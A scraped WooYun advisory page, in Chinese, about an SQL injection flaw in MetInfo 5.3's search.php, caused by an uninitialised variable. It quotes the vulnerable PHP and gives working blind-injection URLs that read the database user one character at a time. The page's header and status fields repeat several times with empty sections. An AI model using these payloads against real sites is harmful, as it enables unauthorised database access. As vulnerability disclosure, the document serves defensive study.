MetInfo5.3 最新版本SQL注射(可获取部分数据)

漏洞概要关注数(24) 关注此漏洞

漏洞标题：MetInfo5.3 最新版本SQL注射(可获取部分数据)

提交时间：2015-04-09 16:09

修复时间：2015-07-13 16:10

公开时间：2015-07-13 16:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-09：细节已通知厂商并且等待厂商处理中
2015-04-14：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-06-08：细节向核心白帽子及相关领域专家公开
2015-06-18：细节向普通白帽子公开
2015-06-28：细节向实习白帽子公开
2015-07-13：细节向公众公开

简要描述：

MetInfo5.3 最新版本SQL注射

详细说明：

search.php:

$module=intval($module);
    if($class1)$module=0;
    if(intval($module)){
      $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' ";
	}else{
	$class1_info=$class_list[$class1];
	if(!$class1_info)okinfo('../',$pagelang[noid]);
	$class1sql=" class1='$class1' ";
	$class2sql=" class2='$class2' ";
	$class3sql=" class3='$class3' ";
	
	if($class1&&!$class2&&!$class3){
		foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
			if($val['releclass']==$class1){
				$class1re.=" or class1='$val[id]' ";
			}
		}
		if($class1re){
			$class1sql='('.$class1sql.$class1re.')';
		}
	}
	if($class_list[$class2]['releclass']){
		$class1sql=" class1='$class2' ";
		$class2sql=" class2='$class3' ";
		$class3sql="";
	}
	$serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql ";

由于$class1re 没有进行初始化，所以全局只需要越过

foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
			if($val['releclass']==$class1){
				$class1re.=" or class1='$val[id]' ";
			}
		}

这一条逻辑即可：
发送url:
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=1&searchword=1&lang=cn&class1re=xxxxxx
抓取sql语句为：
2015/4/8 14:39 SELECT COUNT(*) FROM met_news where lang='cn' and (recycle='0' or recycle='-1') and displaytype='1' and ( class1='2' xxxxxx) and title like '%1%'
然后进行构造
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=1-- sd
页面是:

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=2-- sd

payload:
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=$NUM,1,0)-- sd
根据页面变化补充$NUM
来进行敏感信息猜测
由于我这里是root
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=114,1,0)-- sd
页面里面没有xxxxxx
http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=1141,1,0)-- sd
页面里面有xxxxx

漏洞证明：

修复方案：

版权声明：转载请注明来源魔鬼的步伐@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-13 16:10

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106582

漏洞标题：MetInfo5.3 最新版本SQL注射(可获取部分数据)

相关厂商：MetInfo

漏洞作者：魔鬼的步伐

提交时间：2015-04-09 16:09

修复时间：2015-07-13 16:10

公开时间：2015-07-13 16:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源魔鬼的步伐@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106582

漏洞标题：MetInfo5.3 最新版本SQL注射(可获取部分数据)

相关厂商：MetInfo

漏洞作者： 魔鬼的步伐

提交时间：2015-04-09 16:09

修复时间：2015-07-13 16:10

公开时间：2015-07-13 16:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0106582"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 魔鬼的步伐@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：魔鬼的步伐

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源魔鬼的步伐@乌云